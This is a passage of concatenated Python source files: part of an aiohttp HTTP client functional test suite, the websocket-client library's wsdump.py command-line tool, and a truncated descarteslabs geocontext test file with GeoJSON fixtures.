ct = self._headers.get('content-type', '').lower()
# application/x-www-form-urlencoded
if ct == 'application/x-www-form-urlencoded':
resp['form'] = urllib.parse.parse_qs(self._body.decode('latin1'))
# multipart/form-data
elif ct.startswith('multipart/form-data'): # pragma: no cover
out = io.BytesIO()
for key, val in self._headers.items():
out.write(bytes('{}: {}\r\n'.format(key, val), 'latin1'))
b = await self._request.read()
out.write(b'\r\n')
out.write(b)
out.write(b'\r\n')
out.seek(0)
message = email.parser.BytesParser().parse(out)
if message.is_multipart():
for msg in message.get_payload():
if msg.is_multipart():
logging.warning('multipart msg is not expected')
else:
key, params = cgi.parse_header(
msg.get('content-disposition', ''))
params['data'] = msg.get_payload()
params['content-type'] = msg.get_content_type()
cte = msg.get('content-transfer-encoding')
if cte is not None:
resp['content-transfer-encoding'] = cte
resp['multipart-data'].append(params)
body = json.dumps(resp, indent=4, sort_keys=True)
# default headers
hdrs = [('Connection', 'close'),
('Content-Type', 'application/json')]
if chunked:
hdrs.append(('Transfer-Encoding', 'chunked'))
else:
hdrs.append(('Content-Length', str(len(body))))
# extra headers
if headers:
hdrs.extend(headers.items())
# headers
for key, val in hdrs:
response.headers[key] = val
if chunked:
self._request.writer.enable_chunking()
await response.prepare(self._request)
# write payload
if write_body:
try:
write_body(response, body)
except Exception:
return
else:
response.write(body.encode('utf8'))
return response
class Functional(Router):
@Router.define('/method/([A-Za-z]+)$')
def method(self, match):
return self._response(self._start_response(200))
@Router.define('/keepalive$')
def keepalive(self, match):
transport = self._request.transport
transport._requests = getattr(transport, '_requests', 0) + 1
resp = self._start_response(200)
if 'close=' in self._query:
return self._response(
resp, 'requests={}'.format(transport._requests))
else:
return self._response(
resp, 'requests={}'.format(transport._requests),
headers={'CONNECTION': 'keep-alive'})
@Router.define('/cookies$')
def cookies(self, match):
cookies = SimpleCookie()
cookies['c1'] = 'cookie1'
cookies['c2'] = 'cookie2'
resp = self._start_response(200)
for cookie in cookies.output(header='').split('\n'):
resp.headers.extend({'Set-Cookie': cookie.strip()})
resp.headers.extend(
{'Set-Cookie':
'ISAWPLB{A7F52349-3531-4DA9-8776-F74BC6F4F1BB}='
'{925EC0B8-CB17-4BEB-8A35-1033813B0523}; HttpOnly; Path=/'})
return self._response(resp)
@Router.define('/cookies_partial$')
def cookies_partial(self, match):
cookies = SimpleCookie()
cookies['c1'] = 'other_cookie1'
resp = self._start_response(200)
for cookie in cookies.output(header='').split('\n'):
resp.add_header('Set-Cookie', cookie.strip())
return self._response(resp)
@Router.define('/broken$')
def broken(self, match):
resp = self._start_response(200)
def write_body(resp, body):
self._transport.close()
raise ValueError()
return self._response(
resp,
body=json.dumps({'t': (b'0' * 1024).decode('utf-8')}),
write_body=write_body)
class TestHttpClientFunctional(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
def tearDown(self):
# just in case if we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
def test_POST_DATA_with_charset(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
form = aiohttp.FormData()
form.add_field('name', 'текст',
content_type='text/plain; charset=koi8-r')
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request('post', url, data=form))
content = self.loop.run_until_complete(r.json())
self.assertEqual(1, len(content['multipart-data']))
field = content['multipart-data'][0]
self.assertEqual('name', field['name'])
self.assertEqual('текст', field['data'])
self.assertEqual(r.status, 200)
r.close()
session.close()
def test_POST_DATA_with_charset_pub_request(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
form = aiohttp.FormData()
form.add_field('name', 'текст',
content_type='text/plain; charset=koi8-r')
r = self.loop.run_until_complete(
aiohttp.request('post', url, data=form, loop=self.loop))
content = self.loop.run_until_complete(r.json())
self.assertEqual(1, len(content['multipart-data']))
field = content['multipart-data'][0]
self.assertEqual('name', field['name'])
self.assertEqual('текст', field['data'])
self.assertEqual(r.status, 200)
r.close()
def test_POST_DATA_with_content_transfer_encoding(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
form = aiohttp.FormData()
form.add_field('name', b'123',
content_transfer_encoding='base64')
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request('post', url, data=form))
content = self.loop.run_until_complete(r.json())
self.assertEqual(1, len(content['multipart-data']))
field = content['multipart-data'][0]
self.assertEqual('name', field['name'])
self.assertEqual(b'123', binascii.a2b_base64(field['data']))
# self.assertEqual('base64', field['content-transfer-encoding'])
self.assertEqual(r.status, 200)
r.close()
session.close()
def test_POST_MULTIPART(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
with MultipartWriter('form-data') as writer:
writer.append('foo')
writer.append_json({'bar': 'баз'})
writer.append_form([('тест', '4'), ('сетс', '2')])
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request('post', url, data=writer))
content = self.loop.run_until_complete(r.json())
self.assertEqual(3, len(content['multipart-data']))
self.assertEqual({'content-type': 'text/plain', 'data': 'foo'},
content['multipart-data'][0])
self.assertEqual({'content-type': 'application/json',
'data': '{"bar": "\\u0431\\u0430\\u0437"}'},
content['multipart-data'][1])
self.assertEqual(
{'content-type': 'application/x-www-form-urlencoded',
'data': '%D1%82%D0%B5%D1%81%D1%82=4&'
'%D1%81%D0%B5%D1%82%D1%81=2'},
content['multipart-data'][2])
self.assertEqual(r.status, 200)
r.close()
session.close()
def test_POST_STREAM_DATA(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
fut = self.loop.create_future()
@aiohttp.streamer
async def stream(writer):
await fut
writer.write(data)
self.loop.call_later(0.01, fut.set_result, True)
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream(),
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
self.assertEqual('application/octet-stream',
content['headers']['Content-Type'])
def test_POST_StreamReader(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
stream = aiohttp.StreamReader(loop=self.loop)
stream.feed_data(data)
stream.feed_eof()
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream,
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
def test_POST_DataQueue(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
stream = aiohttp.DataQueue(loop=self.loop)
stream.feed_data(data[:100], 100)
stream.feed_data(data[100:], len(data[100:]))
stream.feed_eof()
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream,
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
def test_POST_ChunksQueue(self):
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
here = os.path.dirname(__file__)
fname = os.path.join(here, 'sample.key')
with open(fname, 'rb') as f:
data = f.read()
stream = aiohttp.ChunksQueue(loop=self.loop)
stream.feed_data(data[:100], 100)
d = data[100:]
stream.feed_data(d, len(d))
stream.feed_eof()
session = client.ClientSession(loop=self.loop)
r = self.loop.run_until_complete(
session.request(
'post', url, data=stream,
headers={'Content-Length': str(len(data))}))
content = self.loop.run_until_complete(r.json())
r.close()
session.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
def test_request_conn_closed(self):
with run_server(self.loop, router=Functional) as httpd:
httpd['close'] = True
session = client.ClientSession(loop=self.loop)
with self.assertRaises(aiohttp.ServerDisconnectedError):
self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
session.close()
def test_session_close(self):
conn = aiohttp.TCPConnector(loop=self.loop)
session = client.ClientSession(loop=self.loop, connector=conn)
with run_server(self.loop, router=Functional) as httpd:
r = self.loop.run_until_complete(
session.request(
'get', httpd.url('keepalive') + '?close=1'))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertEqual(content['content'], 'requests=1')
r.close()
r = self.loop.run_until_complete(
session.request('get', httpd.url('keepalive')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertEqual(content['content'], 'requests=1')
r.close()
session.close()
conn.close()
def test_multidict_headers(self):
session = client.ClientSession(loop=self.loop)
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('method', 'post')
data = b'sample data'
r = self.loop.run_until_complete(
session.request(
'post', url, data=data,
headers=MultiDict(
{'Content-Length': str(len(data))})))
content = self.loop.run_until_complete(r.json())
r.close()
self.assertEqual(str(len(data)),
content['headers']['Content-Length'])
session.close()
def test_dont_close_explicit_connector(self):
async def go(url):
connector = aiohttp.TCPConnector(loop=self.loop)
session = client.ClientSession(loop=self.loop, connector=connector)
r = await session.request('GET', url)
await r.read()
self.assertEqual(1, len(connector._conns))
connector.close()
session.close()
with run_server(self.loop, router=Functional) as httpd:
url = httpd.url('keepalive')
self.loop.run_until_complete(go(url))
def test_server_close_keepalive_connection(self):
class Proto(asyncio.Protocol):
def connection_made(self, transport):
self.transp = transport
self.data = b''
def data_received(self, data):
self.data += data
if data.endswith(b'\r\n\r\n'):
self.transp.write(
b'HTTP/1.1 200 OK\r\n'
b'CONTENT-LENGTH: 2\r\n'
b'CONNECTION: close\r\n'
b'\r\n'
b'ok')
self.transp.close()
def connection_lost(self, exc):
self.transp = None
async def go():
server = await self.loop.create_server(
Proto, '127.0.0.1', unused_port())
addr = server.sockets[0].getsockname()
connector = aiohttp.TCPConnector(loop=self.loop, limit=1)
session = client.ClientSession(loop=self.loop, connector=connector)
url = 'http://{}:{}/'.format(*addr)
for i in range(2):
r = await session.request('GET', url)
await r.read()
self.assertEqual(0, len(connector._conns))
session.close()
connector.close()
server.close()
await server.wait_closed()
self.loop.run_until_complete(go())
def test_handle_keepalive_on_closed_connection(self):
class Proto(asyncio.Protocol):
def connection_made(self, transport):
self.transp = transport
self.data = b''
def data_received(self, data):
self.data += data
if data.endswith(b'\r\n\r\n'):
self.transp.write(
b'HTTP/1.1 200 OK\r\n'
b'CONTENT-LENGTH: 2\r\n'
b'\r\n'
b'ok')
self.transp.close()
def connection_lost(self, exc):
self.transp = None
async def go():
server = await self.loop.create_server(
Proto, '127.0.0.1', unused_port())
addr = server.sockets[0].getsockname()
connector = aiohttp.TCPConnector(loop=self.loop, limit=1)
session = client.ClientSession(loop=self.loop, connector=connector)
url = 'http://{}:{}/'.format(*addr)
r = await session.request('GET', url)
await r.read()
self.assertEqual(1, len(connector._conns))
with self.assertRaises(aiohttp.ServerDisconnectedError):
await session.request('GET', url)
self.assertEqual(0, len(connector._conns))
session.close()
connector.close()
server.close()
await server.wait_closed()
self.loop.run_until_complete(go())
@mock.patch('aiohttp.client_reqrep.client_logger')
def test_session_cookies(self, m_log):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(loop=self.loop)
resp = self.loop.run_until_complete(
session.request('get', httpd.url('cookies')))
self.assertEqual(resp.cookies['c1'].value, 'cookie1')
self.assertEqual(resp.cookies['c2'].value, 'cookie2')
resp.close()
# Add the received cookies as shared for sending them to the test
# server, which is only accessible via IP
session.cookie_jar.update_cookies(resp.cookies)
# Assert, that we send those cookies in next requests
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertEqual(
content['headers']['Cookie'], 'c1=cookie1; c2=cookie2')
r.close()
session.close()
def test_session_headers(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, headers={
"X-Real-IP": "192.168.0.1"
})
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"X-Real-Ip", content['headers'])
self.assertEqual(
content['headers']["X-Real-Ip"], "192.168.0.1")
r.close()
session.close()
def test_session_headers_merge(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, headers=[
("X-Real-IP", "192.168.0.1"),
("X-Sent-By", "requests")])
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get'),
headers={"X-Sent-By": "aiohttp"}))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"X-Real-Ip", content['headers'])
self.assertIn(
"X-Sent-By", content['headers'])
self.assertEqual(
content['headers']["X-Real-Ip"], "192.168.0.1")
self.assertEqual(
content['headers']["X-Sent-By"], "aiohttp")
r.close()
session.close()
def test_session_auth(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, auth=helpers.BasicAuth("login", "pass"))
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get')))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"Authorization", content['headers'])
self.assertEqual(
content['headers']["Authorization"], "Basic bG9naW46cGFzcw==")
r.close()
session.close()
def test_session_auth_override(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, auth=helpers.BasicAuth("login", "pass"))
r = self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get'),
auth=helpers.BasicAuth("other_login", "pass")))
self.assertEqual(r.status, 200)
content = self.loop.run_until_complete(r.json())
self.assertIn(
"Authorization", content['headers'])
self.assertEqual(
content['headers']["Authorization"],
"Basic b3RoZXJfbG9naW46cGFzcw==")
r.close()
session.close()
def test_session_auth_header_conflict(self):
with run_server(self.loop, router=Functional) as httpd:
session = client.ClientSession(
loop=self.loop, auth=helpers.BasicAuth("login", "pass"))
headers = {'Authorization': "Basic b3RoZXJfbG9naW46cGFzcw=="}
with self.assertRaises(ValueError):
self.loop.run_until_complete(
session.request('get', httpd.url('method', 'get'),
headers=headers))
session.close()
|
wsdump.py
|
#!/Users/marius/Documents/EFREI/S7/Robotique/TP2/pyApp/venv/bin/python3
"""
wsdump.py
websocket - WebSocket client library for Python
Copyright 2021 engn33r
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
from urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
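# Example invocation (endpoint taken from the help text above; it may no longer be live):
#   python wsdump.py ws://echo.websocket.org/ -t "hello" --timings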
class RawInput:
def raw_input(self, prompt):
line = input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, str):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, str):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data) > 2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
test_geocontext.py
|
import pytest
import unittest
import mock
import multiprocessing
import concurrent.futures
import copy
import warnings
from descarteslabs.scenes import geocontext
import shapely.geometry
class SimpleContext(geocontext.GeoContext):
__slots__ = ("foo", "_bar")
def __init__(self, foo=None, bar=None):
super(SimpleContext, self).__init__()
self.foo = foo
self._bar = bar
class TestGeoContext(unittest.TestCase):
def test_repr(self):
simple = SimpleContext(1, False)
r = repr(simple)
expected = """SimpleContext(foo=1,
bar=False)"""
assert r == expected
def test_eq(self):
simple = SimpleContext(1, False)
simple2 = SimpleContext(1, False)
simple_diff = SimpleContext(1, True)
not_simple = geocontext.GeoContext()
assert simple == simple
assert simple == simple2
assert simple != simple_diff
assert simple != not_simple
def test_deepcopy(self):
simple = SimpleContext(1, False)
simple_copy = copy.deepcopy(simple)
assert simple._geometry_lock_ is not simple_copy._geometry_lock_
assert simple == simple_copy
class TestAOI(unittest.TestCase):
def test_init(self):
feature = {
"type": "Feature",
"geometry": {
"coordinates": (
(
(-93.52300099792355, 41.241436141055345),
(-93.7138666, 40.703737),
(-94.37053769704536, 40.83098709945576),
(-94.2036617, 41.3717716),
(-93.52300099792355, 41.241436141055345),
),
),
"type": "Polygon",
},
}
collection = {
"type": "FeatureCollection",
"features": [feature, feature, feature],
}
bounds_wgs84 = (-94.37053769704536, 40.703737, -93.52300099792355, 41.3717716)
resolution = 40
ctx = geocontext.AOI(collection, resolution=resolution)
assert ctx.resolution == resolution
assert tuple(round(e, 5) for e in ctx.bounds) == tuple(
round(e, 5) for e in bounds_wgs84
)
assert ctx.bounds_crs == "EPSG:4326"
assert isinstance(ctx.geometry, shapely.geometry.GeometryCollection)
assert ctx.__geo_interface__["type"] == "GeometryCollection"
assert ctx.__geo_interface__["geometries"][0] == feature["geometry"]
def test_raster_params(self):
geom = {
"coordinates": (
(
(-93.52300099792355, 41.241436141055345),
(-93.7138666, 40.703737),
(-94.37053769704536, 40.83098709945576),
(-94.2036617, 41.3717716),
(-93.52300099792355, 41.241436141055345),
),
),
"type": "Polygon",
}
bounds_wgs84 = (-94.37053769704536, 40.703737, -93.52300099792355, 41.3717716)
resolution = 40
crs = "EPSG:32615"
align_pixels = False
ctx = geocontext.AOI(geom, resolution, crs, align_pixels)
raster_params = ctx.raster_params
expected = {
"cutline": geom,
"resolution": resolution,
"srs": crs,
"bounds_srs": "EPSG:4326",
"align_pixels": align_pixels,
"bounds": bounds_wgs84,
"dimensions": None,
}
assert raster_params == expected
def test_assign(self):
geom = {
"coordinates": [
[
[-93.52300099792355, 41.241436141055345],
[-93.7138666, 40.703737],
[-94.37053769704536, 40.83098709945576],
[-94.2036617, 41.3717716],
[-93.52300099792355, 41.241436141055345],
]
],
"type": "Polygon",
}
ctx = geocontext.AOI(resolution=40)
ctx2 = ctx.assign(geometry=geom)
assert (
ctx2.geometry.__geo_interface__
== shapely.geometry.shape(geom).__geo_interface__
)
assert ctx2.resolution == 40
assert ctx2.align_pixels
assert ctx2.shape is None
ctx3 = ctx2.assign(geometry=None)
assert ctx3.geometry is None
def test_assign_update_bounds(self):
geom = shapely.geometry.Point(-90, 30).buffer(1).envelope
ctx = geocontext.AOI(geometry=geom, resolution=40)
geom_overlaps = shapely.affinity.translate(geom, xoff=1)
assert geom.intersects(geom_overlaps)
ctx_overlap = ctx.assign(geometry=geom_overlaps)
assert ctx_overlap.bounds == ctx.bounds
ctx_updated = ctx.assign(geometry=geom_overlaps, bounds="update")
assert ctx_updated.bounds == geom_overlaps.bounds
geom_doesnt_overlap = shapely.affinity.translate(geom, xoff=3)
with pytest.raises(ValueError, match="Geometry and bounds do not intersect"):
ctx.assign(geometry=geom_doesnt_overlap)
ctx_doesnt_overlap_updated = ctx.assign(
geometry=geom_doesnt_overlap, bounds="update"
)
assert ctx_doesnt_overlap_updated.bounds == geom_doesnt_overlap.bounds
with pytest.raises(
ValueError, match="A geometry must be given with which to update the bounds"
):
ctx.assign(bounds="update")
def test_assign_update_bounds_crs(self):
ctx = geocontext.AOI(bounds_crs="EPSG:32615")
assert ctx.bounds_crs == "EPSG:32615"
geom = shapely.geometry.Point(-20, 30).buffer(1).envelope
ctx_no_update_bounds = ctx.assign(geometry=geom)
assert ctx_no_update_bounds.bounds_crs == "EPSG:32615"
ctx_update_bounds = ctx.assign(geometry=geom, bounds="update")
assert ctx_update_bounds.bounds_crs == "EPSG:4326"
with pytest.raises(
ValueError,
match="Can't compute bounds from a geometry while also explicitly setting",
):
ctx = geocontext.AOI(geometry=geom, resolution=40, bounds_crs="EPSG:32615")
def test_validate_bounds_values_for_bounds_crs__latlon(self):
# invalid latlon bounds
with pytest.raises(ValueError, match="Bounds must be in lat-lon coordinates"):
geocontext.AOI(
bounds_crs="EPSG:4326", bounds=[500000, 2000000, 501000, 2001000]
)
# valid latlon bounds, no error should raise
geocontext.AOI(bounds_crs="EPSG:4326", bounds=[12, -41, 14, -40])
def test_validate_bounds_values_for_bounds_crs__non_latlon(self):
# valid latlon bounds, should warn
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
ctx = geocontext.AOI(bounds_crs="EPSG:32615", bounds=(12, -41, 14, -40))
assert ctx.bounds_crs == "EPSG:32615"
assert ctx.bounds == (12, -41, 14, -40)
warning = w[0]
assert "You might have the wrong `bounds_crs` set." in str(warning.message)
# not latlon bounds, no error should raise
geocontext.AOI(
bounds_crs="EPSG:32615", bounds=[500000, 2000000, 501000, 2001000]
)
def test_validate_shape(self):
with pytest.raises(TypeError):
geocontext.AOI(shape=120)
with pytest.raises(TypeError):
geocontext.AOI(shape=(120, 0, 0))
def test_validate_resolution(self):
with pytest.raises(TypeError):
geocontext.AOI(resolution="foo")
with pytest.raises(ValueError):
geocontext.AOI(resolution=-1)
def test_validate_resolution_shape(self):
with pytest.raises(ValueError):
geocontext.AOI(resolution=40, shape=(120, 280))
def test_validate_bound_geom_intersection(self):
# bounds don't intersect
with pytest.raises(ValueError, match="Geometry and bounds do not intersect"):
geocontext.AOI(
geometry=shapely.geometry.box(0, 0, 1, 1),
bounds=[5, 5, 6, 6],
bounds_crs="EPSG:4326",
)
# bounds do intersect; no error should raise
geocontext.AOI(
geometry=shapely.geometry.box(0, 0, 1, 1),
bounds=[0.5, 0.5, 3, 4],
bounds_crs="EPSG:4326",
)
# bounds_crs is not WGS84, so we can't check if bounds and geometry intersect or not---no error should raise
geocontext.AOI(
geometry=shapely.geometry.box(0, 0, 1, 1),
bounds_crs="EPSG:32615",
bounds=[500000, 2000000, 501000, 2001000],
)
def test_validate_reasonable_resolution(self):
# different CRSs --- no error
ctx = geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:4326",
bounds=[0, 0, 1.5, 1.5],
resolution=15,
)
assert ctx.crs == "EPSG:32615"
assert ctx.bounds_crs == "EPSG:4326"
assert ctx.bounds == (0, 0, 1.5, 1.5)
assert ctx.resolution == 15
# same CRSs, bounds < resolution --- no error
geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:32615",
bounds=[200000, 5000000, 200100, 5000300],
resolution=15,
)
# same CRSs, width < resolution --- error
with pytest.raises(ValueError, match="less than one pixel wide"):
geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:32615",
bounds=[200000, 5000000, 200001, 5000300],
resolution=15,
)
# same CRSs, height < resolution --- error
with pytest.raises(ValueError, match="less than one pixel tall"):
geocontext.AOI(
crs="EPSG:32615",
bounds_crs="EPSG:32615",
bounds=[200000, 5000000, 200100, 5000001],
resolution=15,
)
# same CRSs, width < resolution, CRS is lat-lon --- error including "decimal degrees"
with pytest.raises(
ValueError, match="resolution must be given in decimal degrees"
):
geocontext.AOI(
crs="EPSG:4326",
bounds_crs="EPSG:4326",
bounds=[10, 10, 11, 11],
resolution=15,
)
class TestDLTile(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.key = "128:16:960.0:15:-1:37"
cls.dltile_dict = {
"geometry": {
"coordinates": [
[
[-94.64171754779824, 40.9202359006794],
[-92.81755164322226, 40.93177944075989],
[-92.81360932958779, 42.31528732533928],
[-94.6771717075502, 42.303172487087394],
[-94.64171754779824, 40.9202359006794],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32615",
"key": "128:16:960.0:15:-1:37",
"outputBounds": [361760.0, 4531200.0, 515360.0, 4684800.0],
"pad": 16,
"resolution": 960.0,
"ti": -1,
"tilesize": 128,
"tj": 37,
"zone": 15,
"geotrans": [361760.0, 960.0, 0, 4684800.0, 0, -960.0],
"proj4": "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs ",
"wkt": 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]', # noqa
},
"type": "Feature",
}
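        # Note: judging from the properties above, the key "128:16:960.0:15:-1:37"
        # encodes tilesize:pad:resolution:zone:ti:tj.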
cls.key2 = "128:8:960.0:15:-1:37"
cls.dltile2_dict = {
"geometry": {
"coordinates": [
[
[-94.55216325894683, 40.99065655298372],
[-92.90868033200002, 41.00107128418895],
[-92.90690635754177, 42.246233215798036],
[-94.58230042864014, 42.235355721757024],
[-94.55216325894683, 40.99065655298372],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32615",
"geotrans": [369440.0, 960.0, 0, 4677120.0, 0, -960.0],
"key": "128:8:960.0:15:-1:37",
"outputBounds": [369440.0, 4538880.0, 507680.0, 4677120.0],
"pad": 8,
"proj4": "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs ",
"resolution": 960.0,
"ti": -1,
"tilesize": 128,
"tj": 37,
